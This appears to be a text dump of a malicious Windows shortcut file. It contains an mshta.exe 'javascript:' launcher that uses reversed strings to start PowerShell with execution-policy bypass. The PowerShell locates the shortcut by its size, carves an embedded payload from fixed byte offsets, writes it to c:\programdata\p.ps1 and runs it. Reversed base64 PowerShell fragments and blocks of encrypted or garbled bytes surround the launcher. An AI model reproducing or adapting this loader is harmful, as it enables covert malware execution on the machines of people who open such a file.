Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
TYdEv.B
Gfo 1u
>$kmno="R3RGJ7kiMrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxEa0FGU3RGJ70VMrkGJbZGJ9cWYsZGJ70VakslZk0jcvhlYksXKlpXaTZGJgQHbtASakgSZslGa3ByOvRSPpRyO05WdvNmLmRCI9ASZ6l2UmRCI7UGd5JEIn5Wak92YuVULg0GJgM2Zg0DImRyOnEzcw5CccxVY0FGZtFmcn9mcwxFX6M2Jg0WZ0lULlZ3btVmU";$wyc71=$kmno.ToCharArray();[array]::Reverse($wyc71);$qsu= -join($wyc71);$mqwb="rAHJgsTKuVGThRXYEdHZkAyKg4WZMhGdhB1dkRyKgkmZkAyKgkGJoACds1CIwRCI7kmZksSak0Dck0Fdul2WoI3bmtXKwASZu1CIy9GWiRCKml2O9tTZ15Wa052bjtjblxUY0FGR3RGJr4WZMhGdhB1dkRyKpZGJrkGJ9kGJ7liMgEXZtAyZhxmZkgiZpByOwETPpZGJ7kiNrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxUY0FG";$dmn80=$mqwb.ToCharArray();[array]::Reverse($dmn80);$iov= -join($dmn80);$suwz="ZkgSXdtVZ0lnYbhCIoRXYwRCIjNHI7kSXpITLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkgyZulmc0NFdldkLJl0QTFkO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTtFI9ACa0FGcksTXpETLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkASPggXZIhGdhBHJd11WlRXeit1O91ncvhlYkAicvhnYtASXwRyWmRCI9ASXwRyWmRCI7lyK";$mqu61=$suwz.ToCharArray();[array]::Reverse($mqu61);$cgj= -join($mqu61);$kqxg="9tjblxUY
;9$,9*&/*?*
{x}rye?&;K.!$>}viiq,$<2zvi(.!)
e?;"9(
kvk#8k?.
xsrk%<"$."iiv3?<2:q)>
qii,-/?
/9,.8-iiv!"-$!".$!<"$Bqb9*
xy%)%"!"
qii-.8.%(&>iiv/=.=/q?3.
k.&>8.
iq)(.sv8?9
.=.98.c,$<2zbq.!$>}kvk.!$>}kmk)(.sq"&;8xvi`ii
kvk/opl;&?e~{}
&*9,$9
lv%-ok/%*&ii`ii&$(fk88*ii`ii;2)k;.fk''.#8ii`ii9.<$ii`ii;iikvk/&(
<$;qii),#s#r|x2yrk-".$8iiv)!3&qbii''ii`ii.#
e?;"ii`ii9(
iic?iq2/"{v8?9
.=.98.c"&;8xbq.!$>}kvk.!$>}kmk2/"{q81-%~vi;2)k;.fk''.#8ii`ii9.<$;iikvk/&(
<$;q.>9?kg{kg/&(
<$;k%>
e#8qiip/ok%$"ii`ii88.9ii`ii;3
f. $ii`ii=%
kp%-ok?%.?%$iiiq<2*zv8?9
.=.98.c81-%~bq.!$>}kvk.!$>}kmk<2*zq(.,!yviqiip.ok%$"88.ii`ii9;3
f. $=ii`ii%
kp%-ok?%.?%ii`ii$
kvk.opl?*/e1;&?
&*9,$9
lv%-ok/%ii`ii*&&$(fk88*ii`iiiq;8=}v8?9
.=.98.c(.,!ybq.!$>}kvk.!$>}kmk;8=}q.!$>yvie,%"?;ii`ii"9(
iic?(.!)
kvk.=("&8k?.
qb{{{yc;..'
e?;"9(
qii-.$;8 '$;&*<?2:iiv2>>q.8'*-kg{kg/&(
<$;k%>
e#8iq":8zv8?9
.=.98.c.!$>ybq.!$>}kvk.!$>}kmk":8zq=<2*rviqbii?*/e1;&?
&*9ii`ii,$9
iic.'"
e.=("&8qbii?(.!)
&.ii`ii?82
iq(.#sv8?9
.=.98.c=<2*rbq.!$>}kvk.!$>}kmk(.#sqq
3.(>?.k.!$>}
g>Xtvkcvei`epeX|I404*pit
abcm9&R7^}BQHcc\^4R\PqgiftVS]hNLeQ1WfhV7g1JBM4JS^uN6Ppg\^KFWTccj^h`Le5h6]qJ\`JVGMcEGMcEGMckU@3FGMcEmGJojg4FGMcEmGJkU@tEGMcEmGJUQW6R6]q^S^~VGM``iftNL`~pR\tQS`}VLNc4@M1N7f4BC^qBSPkM\^4RSflN\]spBMcEGMO4EOpBiglFLMcEGMO4saO4E^7RifrVCaQR\Pc06ftV7]qRj^O4cGJM}IsE~JmEWTcIi]mV\`1VmGJM}I7AnH6QnH~IPIqo~JmEWTcc\^qJSfqRLN&? pse629 abcm*PkGlevEvve},-?_evve}Y>>Varavwa, pse62-? oju9$)nkmj, pse62-? kw}a9&\`JVGMcEGMcEGMckU@3FGMcEmGJEW\q=Se4F\^nl\V0RC`55A^h16fo1S]mBoHj1SeoBS^}lCRq4S^4J\aPpBMkJC`lJCMcEGMO4EM=FGMcEmGJcj^h`Le5h6]qJ\`JVGMqN\`4RigcEGMcEGMcEmGJkU@=FGMcEGMcEGMO4sK4hCaBFGMcEGMcEGMcEGMckU@3FGMcEGMcEGMO4UOtE@IsM@Oh16P4hS]\1GaiR6`kR\en16g55ANcU7fq5GOc]SecEGMcEGMcEmGJkU@Aho`hJifiR6goEGHjQ6gwBi^jEG`~hCP41S^p&? gab2<9 kw}a*PkGlevEvve},-?_evve}Y>>Varavwa, gab2<-? hwe9$)nkmj, gab2<-? ojup9&AM=EmfrhC`nRifq=6UsJC`oocGJEGMcE}aO4UOhRjg4VGOh|Sek`jGJkU@jUPK}c~IWJ6QjEGVN^\^n1i^hJ\HcU6`h16folLR55AM=EGaiR6`kR\en16g55ANO4cGJ4jGJ4LMcEGMO4EVN^\^n1i^hJLNcUQW6R6]q^S^~5GMo`\^q=C^0VR`JFmf}RL`hNLMcEGMcEGMckU@Aho`hJifiR6goEGHjQ6gwBi^jEG`~hCP41S
><!)</#*/:/
x~{`:#>Nj=;89sl
#,;w| 9
luj+'%xwsj=;89`
<</7fgu
+8+<=+fj+'%xwguj7/-snc$!' fj+'%xwguj;7+'sl
luj'?=z{sj;7+'`
<</7fgu
+8+<=+fj'?=z{guj!;,snc$!' fj'?=z{guj97/-sl)
*$luj!<9x
sj97/-`
<</7fgu
+8+<=+fj!<9x
guj+'"snc$!' fj!<9x
guj%?9+sly
<w#*;"%
-"*},9>
~luj?=;z{sj%?9+`
<</7fgu
+8+<=+fj?=;z{guj#!>snc$!' fj?=;z{guj7/*)sj7/-ej!;,ej+'"ej#!>uj,7:+=nsn
! 8+<:
:<' )fj7/*)guj<+=nsnc$!' nfj,7:+=nc/=n
8!%+c
6><+=='! nj<+=u
w.Hdf{sfuypu`uHg"#-$:bvg
aus{")66.lnuw )6gu`66?66|wg4w;4pyw664)xw.=66xx66?66q|G:`d}66?66fwGC66<`wq~v[q`uqfW:`d}fwGC4)4|g4`qG.66rqc|a}qvabz}vwz
gx66)mqbwb.`lqZ4qyagqF4f{ffQ4z[.66rqgrpg4fqpgsbr66)pgbw6.rs}$)g`fFqbqfgq<lnuw =.aus{"4)4aus{"424rs}$.ze`c!)6Hu`uPyufs{fDHH.W4v;;4`d}66?66fwg66?66vb.q;;4`d}fw66?66gc66664f`;4I%"	&-"'9$"!'&Oqf{WGUqz}|wuY
gu@q`updAqspQ`r{g{fw}Y4z`;4%4{y;4q`a66?66z}y4wg;4q`66?66uqfw;4g
6.w|y&)g`fFqbqfgq<ze`c!=.aus{"4)4aus{"424w|y&.lp~f#)66666z66?66aFHz{}gfqB`zqffaWHgc{p66?66z}CH`r{g{fw66?66}YHqfuc`r{GHAW_\66664ppu4sqf4w;4pyw664)4m}`za.664,-&,-'$4q{y4}zwya66)v~ly.qgxur48$48xw4zaF:|g.66r;46666dy`:&-"'$H6.uwq')g`fFqbqfgq<lp~f#=.aus{"4)4aus{"424uwq'.|}
z )6Pyufs{fDHH.W4`d66?66}fwg66?66vb.q;;4v66?66;;4qlq:`d}f66?66wgcH&'yq`gmgHgc{pz66?66}cH.w66664p;4NGKSQF4`;4pu{xz}C4b;46.`cu,)g`fFqbqfgq<|}
z =.aus{"4)4aus{"424`cu,.~{au")694ggu66?66dmv4dq94xxq|g66?66fqc{66?66d664)4m}`za.66vbr|a}{q|g}{y66)v~ly.qgxur48$48m}`za4zaF:|g.66r;46666gvb: & #FHHu`u6.{cm!)g`fFqbqfgq<~{au"=.aus{"4)4aus{"424{cm!.uwqr')6`za4zaF:|g.66/p04z{}66?66ggqf66?66dlQ9q
{66?66bz]4/zr04`zq`z{66?66W9`qS4)4p0/3dy`:$ $YlHHu`uPyufs{fDHH.W3)zr04pzuy66?66y{w6.}y{ )g`fFqbqfgq<uwqr'=.aus{"4)4aus{"424}y{ .bmp} )6{fDHH.W66<qx}Rq`qxqP:[GR~v{.=66`wq~v[yq`gmGqx}R:sz}`d}fwG66<`wq~v[q`uqfW4)4[GR~v{4`qG.=$$$&<dqqxG:`d}fwGC.qgxur48$48m}6.flp-)g`fFqbqfgq<bmp} =.aus{"4)4aus{"424flp-.`acm')6.=66gvb:$-#"gHHu`uPyufs6.vwq$)g`fFqbqfgq<`acm'=.aus{"4)4aus{"424vwq$..Qlqwa`q4aus{"
&Windows
System32
%mshta.exe
javascript:q=";)(esolc;)0,0,c(nuR.a;)'llehS.tpircSW'(tcejbOXev"+"itcA wen=a";w=q.split('').reverse().join('');b="-Object";d="$m=Get-C"+"hildItem ";e="*.lnk | where"+b+"{$_.length -eq $t}";f="select";g=" -Encoding Byte;";c="p"+"ower"+"shell -ep by"+"pass -c $o=0x1528;$t=0x2f18;"+d+e+" | "+f+b+" -Expa"+"ndProperty Name;if($m.count -eq 0){"+d+"$env:T"+"EMP\\*\\"+e+";};$f=gc $m"+g+"$w='c:\\pro"+"gramdata\\p.ps1';sc $w ([byte[]]($f | "+f+" -Skip 0x0f22 | "+f+" -SkipLast ($t-0x1528)))"+g+". $w";eval(w);
C:\Windows\System32\mshta.exe